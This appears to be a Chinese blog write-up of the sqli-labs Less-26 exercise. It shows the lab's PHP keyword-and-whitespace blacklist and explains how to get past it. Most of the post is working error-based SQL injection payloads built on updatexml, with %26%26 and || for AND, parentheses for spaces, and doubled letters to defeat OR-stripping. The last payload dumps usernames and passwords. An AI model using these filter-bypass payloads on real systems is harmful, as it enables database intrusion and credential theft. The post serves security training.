当前位置:网站首页>SQL注入 Less26(过滤空格和注释符,使用不带空格的报错注入)

SQL注入 Less26(过滤空格和注释符,使用不带空格的报错注入)

2022-07-28 11:24:00 华为云 

function blacklist($id){	$id= preg_replace('/or/i',"", $id);			//strip out OR (non case sensitive)	$id= preg_replace('/and/i',"", $id);		//Strip out AND (non case sensitive)	$id= preg_replace('/[\/\*]/',"", $id);		//strip out /*	$id= preg_replace('/[--]/',"", $id);		//Strip out --	$id= preg_replace('/[#]/',"", $id);			//Strip out #	$id= preg_replace('/[\s]/',"", $id);		//Strip out spaces	$id= preg_replace('/[\/\\\\]/',"", $id);		//Strip out slashes	return $id;}

尝试绕过空格

替换空格:

1)mysql空白符:%09%0A、%0B、%0D、%20%0C、%A0/**/2)正则空白符:%09%0A、%0B、%0D、%2025%为百分号,%25A0就是空白符%09——TAB键(水平)%0a——新建一行%0c——新的一页%0d return 功能%0b——TAB键(垂直)%a0——空格

==内联注释常用于绕过空格==
尝试了一下,发现绕过不了空格
由于Windows下无法使用一些特殊字符来替换空格,Linux可以,可以去Linux下尝试

不使用空格的注入方法(报错注入)

?id=1'||updatexml(1,concat(0x7e,(database())),1)||'1' ='1
?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'

%26是&的url编码。
因为and前后都必须要有空格,所以使用&&
但是&&不能够正常的提交给服务器,所以我们必须输入他的url编码%26%26才行。

||也可以,更好用

?id=1'%26%26updatexml(1,concat('~~',database()),1)%26%26'
在这里插入图片描述

?id=1'%26%26updatexml(1,concat('~~',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security"))),1)%26%26'
==注意这里用括号包裹语句,绕过空格==
用括号()将每个查询的部分独立开
在这里插入图片描述
?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="security"%26%26table_name="users")),0)%26%26'
在这里插入图片描述
near 'LIMIT 0,1'
这个问题,之前报错注入也出现过,可能是多出了Limit 0,1导致构不成整条语句了
也有可能是这里(table_schema="security"%26%26table_name="users")出现了问题

?id=1'%26%26updatexml(1,concat("~~",(select(group_concat(username,passwoorrd))from(users))),0)%26%26'
在这里插入图片描述

https://blog.csdn.net/weixin_43901998/article/details/107340272
https://blog.csdn.net/weixin_43901998/article/details/107340272

原网站

版权声明
本文为[华为云]所创,转载请带上原文链接,感谢
https://bbs.huaweicloud.com/blogs/366764

边栏推荐

猜你喜欢

随机推荐